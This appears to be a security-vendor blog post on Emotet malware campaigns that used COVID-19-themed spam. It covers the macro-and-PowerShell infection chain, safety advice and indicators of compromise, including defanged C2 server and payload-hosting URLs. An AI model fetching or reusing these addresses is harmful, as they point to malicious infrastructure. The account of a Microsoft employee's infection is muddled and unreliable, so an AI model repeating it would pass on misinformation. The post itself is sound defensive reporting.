Share Blog Post
Since January 2020, the Coronavirus (COVID-19) outbreak has made news all around the world and locked people inside their homes. The virus, believed to have originated in Wuhan, China, is spreading like wildfire around the globe. But with this epidemic ongoing, cybercriminals have also started using this outbreak to their advantage. One of the first pieces of malware to take advantage of it is the well-known Trojan “Emotet” that primarily spreads through spam emails and has used COVID-19 themes to lure people into opening malicious attachments.
The Infection Vector of Emotet Malware Attack Campaign
In Jan. 2020, Emotet was one of the first malware that leveraged the coronavirus scare to spread itself. The infection vector was spam email, in which the subject of the emails and attached document file names were the same, but not identical. They were made of various representations of the current date and the Japanese word for “notification” to add an urgency factor for users who fell for it. The spam emails looked like they were sent by a disability welfare service provider in Japan. The text body briefly mentioned that there have been reports of coronavirus patients in the Gifu (administrative jurisdiction area) in Japan and asked the reader to view the attached document. Despite having an almost identical body, the spam email warns of infection reports within a different area, known as “Osaka.” By looking at all emails, it was clear that the attackers were choosing a series of the different regions in Japan to scare the residents of those regions into opening the document. By adding a footer with a postal address along with a phone and fax number, the attackers tried to lend themselves more authenticity.
Until a few months ago, Japanese Emotet emails were focused on corporate style payment notifications and invoices. However, this coronavirus epidemic turns out to be an opportunity for the Emotet operators, as this new approach to delivering Emotet is more successful because the broad impact of the coronavirus and the fear of infection is so real. The content written in the attached document (with spam emails) was an Office 365 message. The document told the viewer to enable the malicious content, and if opened in a protected view, it asked the user to enable the editing mode. If a user fell for it and began it with macros enabled, then an obfuscated VBA (Visual Basic for Applications) macro script would open PowerShell and deliver the Emotet downloader in the background.
Later in March, the malware started to use a new tactic where it was found to be adding the text of coronavirus news stories from major media companies like CNN, to avoid detection by security software using artificial intelligence or machine learning. At the end of the month, it was spreading via spam email having a malicious document or malicious URL. In this attack campaign, the second stage was dropping Emotet, which was found to also be dropping Trickbot. The crypters for the TrickBot and Emotet Trojans were also observed using text from news stories about President Trump's impeachment to lure their target victims. In early-April 2020, an employee of Microsoft had opened a phishing email that led to the shutdown of computers and critical systems. Emotet used the victim's compromised computers to launch a distributed denial of service (DDoS). Later, Microsoft revealed that the employee failed to follow best practice because its email filters did not look up internal emails properly that allowed Emotet to spread locally without causing any alerts.
How to Stay Safe
The Emotet malware is spreading via spam emails while posing as a coronavirus-related email so it is recommended to carefully examine emails, particularly those that include links/attachments. Always defer to genuine news/media websites to read about coronavirus, instead of clicking on news items received via emails. If they seem to come from a legitimate institution, but you don’t remember subscribing to them, verify the contact information. Deploy the latest updates and vulnerability patches for operating systems and applications and make sure that anti-spam filters are correctly configured.
Conclusion
The way the coronavirus pandemic is rising and affecting the entire world, an attacker is not going to rest, and more malware is likely to come. Emotet is just one of the malware types to take advantage of this unique situation, and more malware will use this opportunity as an advantage. Users should stay alert and vigilant to such threats. Providing security awareness training to employees to educate them on how to avoid email-laden threats in this unique situation can help deal with the situation.
Indicators of Compromise
MD5
8C809B4AC6D95CE85A0F04CD04B7A7EA
586FB4A6FFDFEB423F1F1782AAA9BB9F
8800EBD065B52468FA778B4527437F5A
379959D80D0BFC45AAB6437474D1F727
C2 Server
http://109[.]236[.]109[.]159:8080/vnx8v
http://85[.]96[.]49[.]152/6oU9ipBIjTSU1
http://186[.]10[.]98[.]177/faHtH2y
Emotet Malware URL
http://erasmus-plius.tomasjs[.]com/wp-admin/KfesPCcG/ http://easytogets[.]com/xfxvqq/UXbKAbm/
http://drhuzaifa[.]com/wp-includes/2i48k7-evv28gw-205510/
http://dewarejeki[.]info/wp-includes/up58jauc-pum2w-630352/
http://dewakartu[.]info/wp-includes/BRVMFYvIR/
SHA1 hashes
5c0dcde2a9ba42e4788699955b9d16095e980793
Ssdeep
1536:LOCODWJKa/8SNYBaPyvoLNFfiXIcN9WNPC6x/NIUcN1OO7Pdbm/Vtf:LNblN+aPyv4fIIcSN64WMKdy/VJ
MD5 hashes
39faec87e3efac12b85ddb37e4311574
SHA256 hashes
7a7d045663a963148876be3cd32cb95412fdcaa4f0b3e596d11734241bbf5bff
Tags
Posted on: April 15, 2020
More from Cyware
Stay updated on the security threat landscape and technology innovations at Cyware with our threat intelligence briefings and blogs.
The Virtual Cyber Fusion Suite
